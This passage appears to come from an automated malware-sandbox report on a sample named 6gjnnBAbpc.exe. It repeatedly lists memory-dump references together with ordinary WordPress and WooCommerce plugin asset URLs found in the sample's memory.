00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 